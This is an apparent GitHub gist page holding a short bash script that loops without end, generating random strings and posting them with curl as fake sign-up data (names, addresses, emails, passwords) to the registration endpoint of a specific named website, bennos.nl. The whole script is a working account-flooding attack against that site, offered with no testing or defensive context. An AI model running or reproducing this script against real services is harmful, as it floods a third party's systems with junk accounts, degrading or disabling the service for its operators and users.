Skip to content

Instantly share code, notes, and snippets.

@KeizerDev
Created January 24, 2018 14:19
Show Gist options
  • Save KeizerDev/f84163d2bc890599b9f6dd0ae94dce60 to your computer and use it in GitHub Desktop.
Save KeizerDev/f84163d2bc890599b9f6dd0ae94dce60 to your computer and use it in GitHub Desktop.
while true; do
NEW_UUID=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
echo "firstname=$NEW_UUID&middlename=dfsaf&lastname=sdfsf&date_of_birth=1998-12-23&address=$NEW_UUID&city=$NEW_UUID&zipcode=dfasfds&email=$NEW_UUID%40gmail.com&password=$NEW_UUID&check=edit"
curl 'http://bennos.nl/register' -H 'Pragma: no-cache' -H 'Origin: http://bennos.nl' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9,nl;q=0.8' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' -H 'Referer: http://bennos.nl/register' --data "firstname=$NEW_UUID&middlename=dfsaf&lastname=sdfsf&date_of_birth=1998-12-23&address=$NEW_UUID&city=$NEW_UUID&zipcode=dfasfds&email=$NEW_UUID%40gmail.com&password=$NEW_UUID&check=edit" --compressed
done;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment